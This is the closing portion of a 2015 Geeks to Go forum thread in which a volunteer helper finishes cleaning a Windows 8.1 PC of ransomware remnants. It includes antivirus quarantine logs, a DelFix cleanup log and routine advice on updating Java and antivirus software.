C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\Disc_00002306-0002-0035-0369-3B13BB50BB2C\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\Disc_00002306-0002-0035-0369-3B13BB50BB2C\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\Disc_00002306-0002-0035-0369-3B13BB50BB2C\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\Disc_00002306-0002-0035-0369-3B13BB50BB2C\Info\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\Disc_00002306-0002-0035-0369-3B13BB50BB2C\Info\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00002306-0002-0035-0369-3B13BB50BB2C\Disc_00002306-0002-0035-0369-3B13BB50BB2C\Info\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\Disc_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\Disc_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\Disc_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\Disc_00302A03-0002-001E-2583-6F69A33D2940\Info\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\Disc_00302A03-0002-001E-2583-6F69A33D2940\Info\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\DefaultMember\Movie_00302A03-0002-001E-2583-6F69A33D2940\Disc_00302A03-0002-001E-2583-6F69A33D2940\Info\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\Title00\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\Title00\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\Title00\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\Title00\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_000D1101-0002-0007-AA6E-8D0AF0F9B6D5\Chapter\Title00\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\Chapter\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\Chapter\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\Chapter\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\Chapter\Title00\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\Chapter\Title00\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\CyberLink\LocalStorage_V2\LocalData\Disc_00302A03-0002-001E-2583-6F69A33D2940\Chapter\Title00\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Documents\Youcam\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\Youcam\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Documents\Youcam\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\Pictures\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Pictures\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\Pictures\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
D:\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
D:\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
D:\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
D:\$RECYCLE.BIN\S-1-5-21-2321640021-2341620851-140482586-1002\$R7ZZVDQ.HTML Win32/Filecoder.CR trojan deleted - quarantined
D:\$RECYCLE.BIN\S-1-5-21-2321640021-2341620851-140482586-1002\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
D:\$RECYCLE.BIN\S-1-5-21-2321640021-2341620851-140482586-1002\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
D:\$RECYCLE.BIN\S-1-5-21-2321640021-2341620851-140482586-1002\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
 
 

 Results of screen317's Security Check version 1.006  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Avira Antivirus    
Windows Defender   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:````````` 
 Google Chrome (44.0.2403.107) 
 Google Chrome (44.0.2403.125) 
````````Process Check: objlist.exe by Laurent````````  
 Avira Antivir avgnt.exe 
 Avira Antivir avguard.exe 
 Avira Antivirus sched.exe  
 Avira Antivirus avshadow.exe  
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 

  • 0

#8
Pyxis
Posted 01 August 2015 - 11:11 PM

Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts

Our work is done here then. :) Keeping Windows Defender is your call. Personally, I have it turned off since it cannot be uninstalled. Since you already have an anti-virus you can do the same. Below are the last few things you should do:

Thank you for your cooperation. Your logs show no sign of infection. Congratulations, your system is now clean. :thumbsup: Below are the last few steps for you to accomplish.

Remove Temporary Files with TFC by OldTimer

  • Download 'TFC by OldTimer' and save it to your desktop.
    • Ensure all programs and windows are closed before proceeding.
    • Simply double-click the program icon to run it. It will ask for administrator privileges.
    • Click the Start button and wait for the process to complete.
    • You will be prompted to reboot. Please allow it by choosing Yes.

Remove Special Tools with DelFix by Xplode

  • Download 'DelFix by Xplode' and save it to your desktop.
    • Simply double-click the program icon to run it. It will ask for administrator privileges.
    • Ensure the following options are checked:
      • Remove disinfection tools
      • Create registry backup
      • Purge system restore
      • Reset system settings
    • Press Run.
    • A log will automatically pop-up. Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.

  • 0

#9
smwifey
Posted 02 August 2015 - 07:06 AM

smwifey

    Member

  • Topic Starter
  • Member
  • PipPip
  • 85 posts

Thanks so much for all your help.  Running SO much better.

 

# DelFix v1.010 - Logfile created 02/08/2015 at 09:04:09
# Updated 26/04/2015 by Xplode
# Username : Richie - RICHIE
# Operating System : Windows 8.1  (64 bits)
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\Users\Richie\Desktop\FRST-OlderVersion
Deleted : C:\TDSSKiller.3.1.0.5_30.07.2015_20.01.50_log.txt
Deleted : C:\Users\Richie\Desktop\Addition.txt
Deleted : C:\Users\Richie\Desktop\esetsmartinstaller_enu.exe
Deleted : C:\Users\Richie\Desktop\Fixlog.txt
Deleted : C:\Users\Richie\Desktop\FRST.txt
Deleted : C:\Users\Richie\Desktop\FRST64.exe
Deleted : C:\Users\Richie\Desktop\SecurityCheck.exe
Deleted : C:\Users\Richie\Desktop\tdsskiller.exe
Deleted : C:\Users\Richie\Desktop\TFC.exe
Deleted : C:\Users\Richie\Downloads\Addition.txt
Deleted : C:\Users\Richie\Downloads\FRST.txt
Deleted : C:\Users\Richie\Downloads\FRST64.exe
Deleted : HKLM\SOFTWARE\OldTimer Tools
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########

  • 0

#10
Pyxis
Posted 02 August 2015 - 08:16 AM

Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
I will now proceed to giving to tips on how to maintain your system as it is. Anytime you encounter an infection again, please do not hesitate to go back here at Geeks to Go. :)

Remove, Disable, or Update Java

As Java is the 'most exploited program at this time', I recommend that you remove it unless you need it. If so, it is prudent to 'disable it in your web browser(s)' while ensuring your copy is always up-to-date. Older versions are prone to exploits and vulnerabilities.
  • Download the latest 'Java' installation and save it to your desktop.
    • You need to uninstall any previous Java installations.
      • For Windows XP: Navigate to Start > Control Panel > Add or Remove Programs.
      • For Windows Vista: Navigate to Start > Control Panel > Programs and Features or Uninstall a Program.
      • For Windows 7: Navigate to Start > Control Panel > Programs and Features or Uninstall a Program.
      • For Windows 8: Navigate to Start > Start Context Menu > Programs and Features or Uninstall a Program.
    • Search the list for previous installations of Java such as all versions below:
      • Java™ 8 Update 51
    • Proceed to uninstalling the old versions and install the one you've just downloaded.
Update Your Anti-Virus Every Day

Updating


Ensuring that you have one anti-virus installed in your system is a good way to prevent being infected. You must always make sure to update your anti-virus every day; anti-virus companies see to to it that the latest definition updates are distributed to be up to par with the propagation of malware. Your anti-virus is useless if you do not update it.


Scanning


Set a scanning routine. Ensure that you do a full scan with your anti-virus monthly. This is part of maintaining a clean system--a scanning routine proves to be effective. You can never be sure when your computer has caught an infection.


If you have any unresolved issues with regard to this thread or you need more :help: please ask me. I would assist you further, should it be required. Otherwise, enjoy your clean system.

:cheers:

Thank you.
  • 0

#11
Pyxis
Posted 04 August 2015 - 03:56 AM

Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
Since this issue appears to be resolved, this topic has been closed. Glad we could help. :)

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please begin a new topic.
  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP